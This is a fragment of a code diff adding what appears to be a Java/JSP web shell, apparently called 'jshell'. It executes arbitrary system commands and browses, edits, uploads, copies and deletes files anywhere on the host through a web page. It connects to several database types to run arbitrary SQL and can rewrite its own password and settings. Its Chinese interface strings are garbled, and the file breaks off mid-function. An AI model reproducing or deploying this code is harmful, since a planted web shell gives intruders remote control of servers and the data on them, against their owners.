+ char[] tmpBuffer = new char[1024];
+ int nRet = 0;
+ 
+ try {
+  proc = runtime.exec(cmd);
+  insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+  
+  while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+   retStr += new String(tmpBuffer, 0, nRet);
+  }
+  
+  insReader.close();
+  retStr = HTMLEncode(retStr);
+ } catch (Exception e) {
+  retStr = "<font color=\"red\">bad command \"" + cmd + "\"</font>";
+ } finally {
+  return retStr;
+ }
+}
+
+public String pathConvert(String path) {
+ String sRet = path.replace('\\', '/');
+ File file = new File(path);
+ 
+ if (file.getParent() != null) {
+  if (file.isDirectory()) {
+   if (! sRet.endsWith("/"))
+    sRet += "/";
+  }
+ } else {
+  if (! sRet.endsWith("/"))
+   sRet += "/"; 
+ }
+ 
+ return sRet;
+}
+
+public String strCut(String str, int len) {
+ String sRet;
+ 
+ len -= 3;
+ 
+ if (str.getBytes().length <= len) {
+  sRet = str;
+ } else {
+  try {
+   sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
+  } catch (Exception e) {
+   sRet = str;
+  }
+ }
+ 
+ return sRet;
+}
+
+public String listFiles(String path, String curUri) {
+ File[] files = null;
+ File curFile = null;
+ String sRet = null;
+ int n = 0;
+ boolean isRoot = path.equals("");
+ 
+ path = pathConvert(path);
+ 
+ try {
+  if (isRoot) {
+   files = File.listRoots();
+  } else {
+   try {
+    curFile = new File(path);
+    String[] sFiles = curFile.list();
+    files = new File[sFiles.length];
+     
+    for (n = 0; n < sFiles.length; n ++) {
+     files[n] = new File(path + sFiles[n]);
+    }
+   } catch (Exception e) {
+    sRet = "<font color=\"red\">bad path \"" + path + "\"</font>";
+   }
+  }
+  
+  if (sRet == null) {
+   sRet = "\n";
+   sRet += "<script language=\"javascript\">\n";
+   sRet += "var selectedFile = null;\n";
+   sRet += "<!--\n";
+   sRet += "function createFolder() {\n";
+   sRet += " var folderName = prompt(\"������Ŀ¼��\", \"\");\n";
+   sRet += " if (folderName != null && folderName != false && ltrim(folderName) != \"\") {\n";
+   sRet += "  window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFolder&folderName=\" + folderName + \"" + "\";\n";
+   sRet += " }\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function createFile() {\n";
+   sRet += " var fileName = prompt(\"�������ļ���\", \"\");\n";
+   sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
+   sRet += "  window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFile&fileName=\" + fileName + \"" + "\";\n";
+   sRet += " }\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function selectFile(obj) {\n";
+   sRet += " if (selectedFile != null)\n";
+   sRet += "  selectedFile.style.backgroundColor = \"#FFFFFF\";\n";
+   sRet += " selectedFile = obj;\n";
+   sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function change(obj) {\n";
+   sRet += " if (selectedFile != obj)\n";
+   sRet += "  obj.style.backgroundColor = \"#CCCCCC\";\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function restore(obj) {\n";
+   sRet += " if (selectedFile != obj)\n";
+   sRet += "  obj.style.backgroundColor = \"#FFFFFF\";\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function showUpload() {\n";
+   sRet += " up.style.visibility = \"visible\";\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function copyFile() {\n";
+   sRet += " var toPath = prompt(\"������Ҫ���Ƶ���Ŀ¼(����·��)\", \"\");\n";
+   sRet += " if (toPath != null && toPath != false && ltrim(toPath) != \"\") {\n";
+   sRet += "  document.fileList.action = \"" + curUri + "&curPath=" + path + "&fsAction=copyto&dstPath=" + "\" + toPath;\n";
+   sRet += "  document.fileList.submit();\n";
+   sRet += " }\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "function rename() {\n";
+   sRet += " var count = 0;\n";
+   sRet += " var selected = -1;\n";
+   sRet += " for (var i = 0; i < document.fileList.filesDelete.length; i ++) {\n";
+   sRet += "  if (document.fileList.filesDelete[i].checked) {\n";
+   sRet += "   count ++;\n";
+   sRet += "   selected = i;\n";
+   sRet += "  }\n";
+   sRet += " }\n";
+   sRet += " if (count > 1)\n";
+   sRet += "  alert(\"��������������ļ�\");\n";
+   sRet += " else if (selected == -1)\n";
+   sRet += "  alert(\"û��ѡ��Ҫ���������ļ�\");\n";
+   sRet += " else {\n";
+   sRet += "  var newName = prompt(\"���������ļ���\", \"\");\n";
+   sRet += "  if (newName != null && newName != false && ltrim(newName) != \"\") {\n";
+   sRet += "   window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=rename&newName=\" + newName + \"&fileRename=\" + document.fileList.filesDelete[selected].value;";
+   sRet += "  }\n";
+   sRet += " }\n";
+   sRet += "}\n";
+   sRet += "\n";
+   sRet += "//-->\n";
+   sRet += "</script>\n";
+   sRet += "<table width=\"100%\" border=\"0\" cellpadding=\"2\" cellpadding=\"1\">\n";
+   sRet += " <form enctype=\"multipart/form-data\" method=\"post\" name=\"upload\" action=\"" + curUri + "&curPath=" + path + "&fsAction=upload" + "\">\n";
+   
+   if (curFile != null) {
+    sRet += " <tr>\n";
+    sRet += "  <td colspan=\"4\" valign=\"middle\">\n";
+    sRet += "   &nbsp;<a href=\"" + curUri + "&curPath=" + (curFile.getParent() == null ? "" : pathConvert(curFile.getParent())) + "\">�ϼ�Ŀ¼</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:createFolder()\">����Ŀ¼</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:createFile()\">�½��ļ�</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:document.fileList.submit();\">ɾ��</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:copyFile()\">����</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:rename()\">������</a>&nbsp;";
+    sRet += "<a href=\"#\" onclick=\"javascript:showUpload()\">�ϴ��ļ�</a>\n";
+    sRet += "<span style=\"visibility: hidden\" id=\"up\"><input type=\"file\" value=\"�ϴ�\" name=\"upFile\" size=\"8\" class=\"textbox\" />&nbsp;<input type=\"submit\" value=\"�ϴ�\" class=\"button\"></span>\n";
+    sRet += "  </td>\n";
+    sRet += " </tr>\n";
+   }
+   
+   sRet += "</form>\n";
+   
+   sRet += " <form name=\"fileList\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=deleteFile" + "\">\n";
+   
+   for (n = 0; n < files.length; n ++) {
+    sRet += " <tr onclick=\"javascript: selectFile(this)\" onmouseover=\"javascript: change(this)\" onmouseout=\"javascript: restore(this)\" style=\"cursor:hand;\">\n";
+    
+    if (! isRoot) {
+     sRet += "  <td width=\"5%\" align=\"center\"><input type=\"checkbox\" name=\"filesDelete\" value=\"" + pathConvert(files[n].getPath()) + "\" /></td>\n";
+     if (files[n].isDirectory()) {
+      sRet += "  <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">&lt;" + strCut(files[n].getName(), 50) + "&gt;</a></td>\n";
+     } else {
+      sRet += "  <td><a title=\"" + files[n].getName() + "\">" + strCut(files[n].getName(), 50) + "</a></td>\n";
+     }
+     
+     sRet += "  <td width=\"15%\" align=\"center\">" + (files[n].isDirectory() ? "&lt;dir&gt;" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<<a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "&fsAction=open" + "\">edit</a>>" : "") + "</td>\n";
+     sRet += "  <td width=\"15%\" align=\"center\">" + files[n].length() + "</td>\n";
+    } else {
+     sRet += "  <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">" + pathConvert(files[n].getPath()) + "</a></td>\n";
+    }
+ 
+    sRet += " </tr>\n";
+   }
+   sRet += " </form>\n";
+   sRet += "</table>\n";
+  }
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">security violation, no privilege.</font>";
+ }
+ 
+ return sRet;
+}
+
+public boolean isTextFile(String extName) {
+ int i;
+ boolean bRet = false;
+ 
+ if (! extName.equals("")) {
+  for (i = 0; i < _textFileTypes.length; i ++) {
+   if (extName.equals(_textFileTypes[i])) {
+    bRet = true;
+    break;
+   }
+  }
+ } else {
+  bRet = true;
+ }
+ 
+ return bRet;
+}
+
+public String getExtName(String fileName) {
+ String sRet = "";
+ int nLastDotPos;
+ 
+ fileName = pathConvert(fileName);
+ 
+ nLastDotPos = fileName.lastIndexOf(".");
+ 
+ if (nLastDotPos == -1) {
+  sRet = "";
+ } else {
+  sRet = fileName.substring(nLastDotPos + 1);
+ }
+ 
+ return sRet;
+}
+
+public String browseFile(String path) {
+ String sRet = "";
+ File file = null;
+ FileReader fileReader = null;
+ 
+ path = pathConvert(path);
+ 
+ try {
+  file = new File(path);
+  fileReader = new FileReader(file);
+  String fileString = "";
+  char[] chBuffer = new char[1024];
+  int ret;
+  
+  sRet = "<script language=\"javascript\">\n";
+  
+  while ((ret = fileReader.read(chBuffer, 0, 1024)) != -1) {
+   fileString += new String(chBuffer, 0, ret);
+  }
+  
+  sRet += "var wnd = window.open(\"about:blank\", \"_blank\", \"width=600, height=500\");\n";
+  sRet += "var doc = wnd.document;\n";
+  sRet += "doc.write(\"" + "aaa" + "\");\n";
+  
+  sRet += "</script>\n";
+  
+ } catch (IOException e) {
+  sRet += "<script language=\"javascript\">\n";
+  sRet += "alert(\"���ļ�" + path + "ʧ��\");\n";
+  sRet += "</script>\n";
+ }
+ 
+ return sRet;
+}
+
+public String openFile(String path, String curUri) {
+ String sRet = "";
+ boolean canOpen = false;
+ int nLastDotPos = path.lastIndexOf(".");
+ String extName = "";
+ String fileString = null;
+ File curFile = null;
+ 
+ path = pathConvert(path);
+ 
+ if (nLastDotPos == -1) {
+  canOpen = true;
+ } else {
+  extName = path.substring(nLastDotPos + 1);
+  canOpen = isTextFile(extName);
+ }
+ 
+ if (canOpen) {
+  try {
+   fileString = "";
+   curFile = new File(path);
+   FileReader fileReader = new FileReader(curFile);
+   char[] chBuffer = new char[1024];
+   int nRet;
+   
+   while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
+    fileString += new String(chBuffer, 0, nRet);
+   }
+   
+   fileReader.close();
+  } catch (IOException e) {
+   fileString = null;
+   sRet = "<font color=\"red\">���ܴ��ļ�\"" + path + "\"</font>";
+  } catch (SecurityException e) {
+   fileString = null;
+   sRet = "<font color=\"red\">��ȫ���⣬û��Ȩ��ִ�иò���</font>";
+  }
+ } else {
+  sRet = "<font color=\"red\">file \"" + path + "\" is not a text file, can't be opened in text mode</font>";
+ }
+ 
+ if (fileString != null) {
+  sRet += "<script language=\"javascript\">";
+  sRet += "<!--\n";
+  sRet += "function saveAs() {\n";
+  sRet += " var fileName = prompt(\"�������ļ���\", \"\");\n";
+  sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
+  sRet += "  document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n";
+  sRet += "  document.openfile.submit();\n";
+  sRet += " }\n";
+  sRet += "}\n";
+  sRet += "//-->\n";
+  sRet += "</script>\n";
+  sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
+  sRet += " <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=save" + "\">\n";
+  sRet += " <tr>\n";
+  sRet += "  <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">�ϼ�Ŀ¼</a>]</td>\n";
+  sRet += " </tr>\n";
+  sRet += " <tr>\n";
+  sRet += "  <td align=\"center\">\n";
+  sRet += "   <textarea name=\"fileContent\" cols=\"80\" rows=\"32\">\n";
+  sRet += fileString;
+  sRet += "   </textarea>\n";
+  sRet += "  </td>\n";
+  sRet += " </tr>\n";
+  sRet += " <tr>\n";
+  sRet += "  <td align=\"center\"><input type=\"submit\" class=\"button\" value=\"����\" />&nbsp;<input type=\"button\" class=\"button\" value=\"����Ϊ\" onclick=\"javascript:saveAs()\" /></td>\n";
+  sRet += " </tr>\n";
+  sRet += " </form>\n";
+  sRet += "</table>\n";
+ }
+ 
+ return sRet;
+}
+
+public String saveFile(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+ 
+ path = pathConvert(path);
+ 
+ try {
+  file = new File(path);
+  
+  if (! file.canWrite()) {
+   sRet = "<font color=\"red\">�ļ�����д</font>";
+  } else {
+   FileWriter fileWriter = new FileWriter(file);
+   fileWriter.write(fileContent);
+   
+   fileWriter.close();
+   sRet = "�ļ�����ɹ������ڷ��أ����Ժ򡭡�\n";
+   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />\n"; 
+  }
+ } catch (IOException e) {
+  sRet = "<font color=\"red\">�����ļ�ʧ��</font>";
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">��ȫ���⣬û��Ȩ��ִ�иò���</font>";
+ }
+ 
+ return sRet;
+}
+
+public String createFolder(String path, String curUri, String folderName) {
+ String sRet = "";
+ File folder = null;
+ 
+ path = pathConvert(path);
+ 
+ try {
+  folder = new File(path + folderName);
+  
+  if (folder.exists() && folder.isDirectory()) {
+   sRet = "<font color=\"red\">\"" + path + folderName + "\"Ŀ¼�Ѿ�����</font>";
+  } else {
+   if (folder.mkdir()) {
+    sRet = "�ɹ�����Ŀ¼\"" + pathConvert(folder.getPath()) + "\"�����ڷ��أ����Ժ򡭡�\n";
+     sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + folderName + "\" />";
+   } else {
+    sRet = "<font color=\"red\">����Ŀ¼\"" + folderName + "\"ʧ��</font>";
+   }
+  }
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">��ȫ���⣬û��Ȩ��ִ�иò���</font>";
+ }
+ 
+ return sRet;
+}
+
+public String createFile(String path, String curUri, String fileName) {
+ String sRet = "";
+ File file = null;
+ 
+ path = pathConvert(path);
+ 
+ try {
+  file = new File(path + fileName);
+  
+  if (file.createNewFile()) {
+   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + fileName + "&fsAction=open" + "\" />";
+  } else {
+   sRet = "<font color=\"red\">\"" + path + fileName + "\"�ļ��Ѿ�����</font>";
+  }
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">��ȫ���⣬û��Ȩ��ִ�иò���</font>";
+ } catch (IOException e) {
+  sRet = "<font color=\"red\">�����ļ�\"" + path + fileName + "\"ʧ��</font>";
+ }
+ 
+ return sRet;
+} 
+
+public String deleteFile(String path, String curUri, String[] files2Delete) {
+ String sRet = "";
+ File tmpFile = null;
+ 
+ try {
+  for (int i = 0; i < files2Delete.length; i ++) {
+   tmpFile = new File(files2Delete[i]);
+   if (! tmpFile.delete()) {
+    sRet += "<font color=\"red\">ɾ��\"" + files2Delete[i] + "\"ʧ��</font><br>\n";
+   }
+  }
+  
+  if (sRet.equals("")) {
+   sRet = "ɾ���ɹ������ڷ��أ����Ժ򡭡�\n";
+   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
+  }
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">��ȫ���⣬û��Ȩ��ִ�иò���</font>\n";
+ }
+ 
+ return sRet;
+}
+
+public String saveAs(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+ FileWriter fileWriter = null;
+ 
+ try {
+  file = new File(path);
+  
+  if (file.createNewFile()) {
+   fileWriter = new FileWriter(file);
+   fileWriter.write(fileContent);
+   fileWriter.close();
+   
+   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";
+  } else {
+   sRet = "<font color=\"red\">�ļ�\"" + path + "\"�Ѿ�����</font>";
+  }
+ } catch (IOException e) {
+  sRet = "<font color=\"red\">�����ļ�\"" + path + "\"ʧ��</font>";
+ } 
+ 
+ return sRet;
+}
+
+
+public String uploadFile(ServletRequest request, String path, String curUri) {
+ String sRet = "";
+ File file = null;
+ InputStream in = null;
+ 
+ path = pathConvert(path);
+ 
+ try {
+  in = request.getInputStream();
+  
+  byte[] inBytes = new byte[request.getContentLength()];
+  int nBytes;
+  int start = 0;
+  int end = 0;
+  int size = 1024;
+  String token = null;
+  String filePath = null;
+
+  //
+  // ������������һ���ֽ�����
+  //
+  while ((nBytes = in.read(inBytes, start, size)) != -1) {
+   start += nBytes;
+  }
+  
+  in.close();
+  //
+  // ���ֽ������еõ��ļ��ָ�����
+  //
+  int i = 0;
+  byte[] seperator;
+  
+  while (inBytes[i] != 13) {
+   i ++;
+  }
+  
+  seperator =  new byte[i];
+ 
+  for (i = 0; i < seperator.length; i ++) {
+   seperator[i] = inBytes[i];
+  }
+  
+  //
+  // �õ�Header����
+  //
+  String dataHeader = null;
+  i += 3;
+  start = i;
+  while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
+   i ++;
+  }
+  end = i - 1;
+  dataHeader = new String(inBytes, start, end - start + 1);
+  
+  //
+  // �õ��ļ���
+  //
+  token = "filename=\"";
+  start = dataHeader.indexOf(token) + token.length();
+  token = "\"";
+  end = dataHeader.indexOf(token, start) - 1;
+  filePath = dataHeader.substring(start, end + 1);
+  filePath =  pathConvert(filePath);
+  String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
+  
+  //
+  // �õ��ļ����ݿ�ʼλ��
+  // 
+  i += 4;
+  start = i;
+  
+  /*
+  boolean found = true;  
+  byte[] tmp = new byte[seperator.length];
+  while (i <= inBytes.length - 1 - seperator.length) {
+  
+   for (int j = i; j < i + seperator.length; j ++) { 
+    if (seperator[j - i] != inBytes[j]) {
+     found = false;
+     break;
+    } else
+     tmp[j - i] = inBytes[j];
+   }
+   
+   if (found)
+    break;
+   
+   i ++;
+  }*/
+  
+  //
+  // ͵���İ취
+  //
+  end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
+  
+  //
+  // ����Ϊ�ļ�
+  //
+  File newFile = new File(path + fileName);
+  newFile.createNewFile();
+  FileOutputStream out = new FileOutputStream(newFile);
+  
+  //out.write(inBytes, start, end - start + 1);
+  out.write(inBytes, start, end - start + 1);
+  out.close();
+  
+  sRet = "<script language=\"javascript\">\n";
+  sRet += "alert(\"�ļ��ϴ��ɹ�" + fileName + "\");\n";
+  sRet += "</script>\n";
+ } catch (IOException e) {
+  sRet = "<script language=\"javascript\">\n";
+  sRet += "alert(\"�ļ��ϴ�ʧ��\");\n";
+  sRet += "</script>\n";
+ }
+ 
+ sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
+ return sRet;
+}
+
+public boolean fileCopy(String srcPath, String dstPath) {
+ boolean bRet = true;
+ 
+ try {
+  FileInputStream in = new FileInputStream(new File(srcPath));
+  FileOutputStream out = new FileOutputStream(new File(dstPath));
+  byte[] buffer = new byte[1024];
+  int nBytes;
+  
+
+  while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+   out.write(buffer, 0, nBytes);
+  }
+  
+  in.close();
+  out.close();
+ } catch (IOException e) {
+  bRet = false;
+ } 
+ 
+ return bRet;
+}
+
+public String getFileNameByPath(String path) {
+ String sRet = "";
+ 
+ path = pathConvert(path);
+ 
+ if (path.lastIndexOf("/") != -1) {
+  sRet = path.substring(path.lastIndexOf("/") + 1);
+ } else {
+  sRet = path;
+ }
+ 
+ return sRet;
+}
+
+public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) {
+ String sRet = "";
+ int i;
+ 
+ path = pathConvert(path);
+ dstPath = pathConvert(dstPath);
+ 
+ for (i = 0; i < files2Copy.length; i ++) {
+  if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) {
+   sRet += "<font color=\"red\">�ļ�\"" + files2Copy[i] + "\"����ʧ��</font><br/>";
+  }
+ }
+ 
+ if (sRet.equals("")) {
+  sRet = "�ļ����Ƴɹ������ڷ��أ����Ժ򡭡�";
+  sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
+ }
+ 
+ return sRet;
+}
+
+public boolean isFileName(String fileName) {
+ boolean bRet = false;
+ 
+ Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$");
+ Matcher m = p.matcher(fileName);
+ 
+ bRet = m.matches();
+ 
+ return bRet;
+}
+
+public String renameFile(String path, String curUri, String file2Rename, String newName) {
+ String sRet = "";
+ 
+ path = pathConvert(path);
+ file2Rename = pathConvert(file2Rename);
+ 
+ try {
+  File file = new File(file2Rename);
+  
+  newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName;
+  File newFile = new File(newName);
+  
+  if (! file.exists()) {
+   sRet = "<font color=\"red\">�ļ�\"" + file2Rename + "\"������</font>";
+  } else {
+   file.renameTo(newFile);
+   sRet = "�ļ��������ɹ������ڷ��أ����Ժ򡭡�";
+   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
+  }
+ } catch (SecurityException e) {
+  sRet = "<font color=\"red\">��ȫ���⵼���ļ�\"" + file2Rename + "\"����ʧ��</font>";
+ }
+ 
+ return sRet;
+}
+
+public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
+ boolean bRet = true;
+ String driverName = "";
+ 
+ if (dbServer.equals(""))
+  dbServer = "localhost";
+ 
+ try {
+  if (dbType.equals("sqlserver")) {
+   driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
+   if (dbPort.equals(""))
+    dbPort = "1433";
+   _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+  } else if (dbType.equals("mysql")) {
+   driverName = "com.mysql.jdbc.Driver";
+   if (dbPort.equals(""))
+    dbPort = "3306";
+   _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+  } else if (dbType.equals("odbc")) {
+   driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
+   _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
+  } else if (dbType.equals("oracle")) {
+   driverName = "oracle.jdbc.driver.OracleDriver";
+   _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
+  } else if (dbType.equals("db2")) {
+   driverName = "com.ibm.db2.jdbc.app.DB2Driver";
+   _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
+  }
+  
+  Class.forName(driverName);
+ } catch (ClassNotFoundException e) {
+  bRet = false;
+ }
+ 
+ return bRet;
+}
+
+public boolean DBConnect(String User, String Password) {
+ boolean bRet = false;
+ 
+ if (_url != null) {
+  try {
+   _dbConnection = DriverManager.getConnection(_url, User, Password);
+   _dbStatement = _dbConnection.createStatement();
+   bRet = true; 
+  } catch (SQLException e) {
+   bRet = false;
+  } 
+ } 
+ 
+ return bRet;
+}
+
+public String DBExecute(String sql) {
+ String sRet = "";
+ 
+ if (_dbConnection == null || _dbStatement == null) {
+  sRet = "<font color=\"red\">���ݿ�û����������</font>";
+ } else {
+  try {
+   if (sql.toLowerCase().substring(0, 6).equals("select")) {
+    ResultSet rs = _dbStatement.executeQuery(sql);
+    ResultSetMetaData rsmd = rs.getMetaData();
+    int colNum = rsmd.getColumnCount();
+    int colType;
+    
+    sRet = "sql���ִ�гɹ������ؽ��<br>\n";
+    sRet += "<table align=\"center\" border=\"0\" bgcolor=\"#CCCCCC\" cellpadding=\"2\" cellspacing=\"1\">\n";
+    sRet += "    <tr bgcolor=\"#FFFFFF\">\n";
+    for (int i = 1; i <= colNum; i ++) {
+     sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
+    }
+    sRet += "    </tr>\n";
+    while (rs.next()) {
+     sRet += " <tr bgcolor=\"#FFFFFF\">\n";
+     for (int i = 1; i <= colNum; i ++) {
+      colType = rsmd.getColumnType(i);
+      
+      sRet += "  <td>";
+      switch (colType) {
+       case Types.BIGINT:
+       sRet += rs.getLong(i);
+       break;
+       
+       case Types.BIT:
+       sRet += rs.getBoolean(i);
+       break;
+       
+       case Types.BOOLEAN:
+       sRet += rs.getBoolean(i);
+       break;
+       
+       case Types.CHAR:
+       sRet += rs.getString(i);
+       break;
+       
+       case Types.DATE:
+       sRet += rs.getDate(i).toString();
+       break;
+       
+       case Types.DECIMAL:
+       sRet += rs.getDouble(i);
+       break;
+       
+       case Types.NUMERIC:
+       sRet += rs.getDouble(i);
+       break;
+       
+       case Types.REAL:
+       sRet += rs.getDouble(i);
+       break;
+       
+       case Types.DOUBLE:
+       sRet += rs.getDouble(i);
+       break;
+       
+       case Types.FLOAT:
+       sRet += rs.getFloat(i);
+       break;
+       
+       case Types.INTEGER:
+       sRet += rs.getInt(i);
+       break;
+       
+       case Types.TINYINT:
+       sRet += rs.getShort(i);
+       break;
+       
+       case Types.VARCHAR:
+       sRet += rs.getString(i);
+       break;
+       
+       case Types.TIME:
+       sRet += rs.getTime(i).toString();
+       break;
+       
+       case Types.DATALINK:
+       sRet += rs.getTimestamp(i).toString();
+       break;
+      }
+      sRet += "  </td>\n";
+     }
+     sRet += " </tr>\n"; 
+    }    
+    sRet += "</table>\n";
+    
+    rs.close();
+   } else {
+    if (_dbStatement.execute(sql)) {
+     sRet = "sql���ִ�гɹ�";
+    } else {
+     sRet = "<font color=\"red\">sql���ִ��ʧ��</font>";
+    }
+   }
+  } catch (SQLException e) {
+   sRet = "<font color=\"red\">sql���ִ��ʧ��</font>";
+  }
+ }
+ 
+ return sRet;
+}
+
+public void DBRelease() {
+ try {
+  if (_dbStatement != null) {
+   _dbStatement.close();
+   _dbStatement = null;
+  }
+  
+  if (_dbConnection != null) {
+   _dbConnection.close();
+   _dbConnection = null;
+  }
+ } catch (SQLException e) {
+ 
+ }
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+class JshellConfig {
+ private String _jshellContent = null;
+ private String _path = null;
+
+ public JshellConfig(String path) throws JshellConfigException {
+  _path = path;
+  read();
+ }
+ 
+ private void read() throws JshellConfigException {
+  try {
+   FileReader jshell = new FileReader(new File(_path));
+   char[] buffer = new char[1024];
+   int nChars;
+   _jshellContent = "";
+   
+   while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
+    _jshellContent += new String(buffer, 0, nChars);
+   }
+   
+   jshell.close();
+  } catch (IOException e) {
+   throw new JshellConfigException("���ļ�ʧ��");
+  }
+ }
+ 
+ public void save() throws JshellConfigException {
+  FileWriter jshell = null;
+ 
+  try {
+   jshell = new FileWriter(new File(_path));
+   char[] buffer = _jshellContent.toCharArray();
+   int start = 0;
+   int size = 1024;
+   
+   for (start = 0; start < buffer.length - 1 - size; start += size) {
+    jshell.write(buffer, start, size);
+   }
+   
+   jshell.write(buffer, start, buffer.length - 1 - start);
+  } catch (IOException e) {
+   new JshellConfigException("д�ļ�ʧ��");
+  } finally {
+   try {
+    jshell.close();
+   } catch (IOException e) {
+   
+   }
+  }
+ }
+ 
+ public void setPassword(String password) throws JshellConfigException {
+  Pattern p = Pattern.compile("\\w+");
+  Matcher m = p.matcher(password);
+  
+  if (! m.matches()) {
+   throw new JshellConfigException("���벻���г���ĸ�����»���������ַ�");
+  }
+  
+  p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
+  m = p.matcher(_jshellContent);
+  if (! m.find()) {
+   throw new JshellConfigException("�������Ѿ����Ƿ��޸�");
+  }
+  
+  _jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
+  
+  //return HTMLEncode(_jshellContent);
+ }
+ 
+ public void setEncodeType(String encodeType) throws JshellConfigException {
+  Pattern p = Pattern.compile("[A-Za-z0-9]+");
+  Matcher m = p.matcher(encodeType);
+  
+  if (! m.matches()) {
+   throw new JshellConfigException("�����ʽֻ������ĸ�����ֵ����");
+  }
+  
+  p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
+  m = p.matcher(_jshellContent);
+  
+  if (! m.find()) {
+   throw new JshellConfigException("�������Ѿ����Ƿ��޸�");
+  }
+  
+  _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
+  //return HTMLEncode(_jshellContent);
+ }
+ 
+ public void setSessionTime(String sessionTime) throws JshellConfigException {
+  Pattern p = Pattern.compile("\\d+");
+  Matcher m = p.matcher(sessionTime);
+  
+  if (! m.matches()) {
+   throw new JshellConfigException("session��ʱʱ��ֻ��������");
+  }
+  
+  p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
+  m = p.matcher(_jshellContent);
+  
+  if (! m.find()) {
+   throw new JshellConfigException("�������Ѿ����Ƿ��޸�");
+  }
+  
+  _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
+  //return HTMLEncode(_jshellContent);
+ }
+ 
+ public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
+  Pattern p = Pattern.compile("\\w+");
+  Matcher m = null;
+  int i;
+  String fileTypes = "";
+  String tmpFileTypes = "";
+  
+  for (i = 0; i < textFileTypes.length; i ++) {
+   m = p.matcher(textFileTypes[i]);
+   
+   if (! m.matches()) {
